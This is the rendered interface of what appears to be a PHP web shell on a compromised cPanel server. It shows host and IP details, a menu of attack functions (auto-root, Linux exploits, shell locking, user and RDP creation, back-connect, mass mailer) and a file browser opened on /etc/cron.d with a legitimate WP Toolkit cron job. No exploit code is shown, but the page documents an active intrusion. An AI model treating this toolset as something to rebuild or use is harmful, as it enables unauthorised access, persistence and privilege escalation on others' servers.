Linux 120.141.167.72.host.secureserver.net 4.18.0-553.150.1.el8_10.x86_64 #1 SMP Fri Jul 31 15:23:31 EDT 2026 x86_64
Apache
: 72.167.141.120 | : 216.73.217.14
808 Domain
7.4.33
bestseocompany
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
cron.d /
[ HOME SHELL ]
Name
Size
Permission
Action
0hourly
128
B
-rw-r--r--
backup_jobs_helper
547
B
-rw-r--r--
comet_license_sync
433
B
-rw-r--r--
cpanel-analytics
130
B
-rw-------
cpanel_autossl
76
B
-rw-------
cpanel_ssl_reissue
58
B
-rw-------
csf-cron
14
B
-rw-r--r--
csf_update
47
B
-rw-------
fm-agent.cron
82
B
-rw-r--r--
installatron
69
B
-rw-------
lfd-cron
74
B
-rw-r--r--
mailman
2.05
KB
-rw-r--r--
wp-toolkit-update
881
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-toolkit-update
# This cronjob is responsible for receiving the updates of WP Toolkit. # It works as following logic: # - WPT CLI is called to receive the available update version; # - If update is found, then the URLs to the host with repositories are updated and cache is cleared for WPT repos; # - If WPT CLI fails (e.g. unable to communicate with update service or WPT is completely broken), then # the cronjob executes wp-toolkit-installer script to set the default URLs to host with repositories; # - Finally the yum update is called to install latest available version. 0 1 * * * root sleep $((1 + RANDOM \% 5))h $((1 + RANDOM \% 60))m; /usr/local/bin/wp-toolkit update-configuration > /dev/null 2> /dev/null || /usr/local/cpanel/3rdparty/wp-toolkit/bin/wp-toolkit-installer.sh --generate-configs > /dev/null 2> /dev/null; /usr/bin/yum -y update wp-toolkit-cpanel > /dev/null 2> /dev/null
Close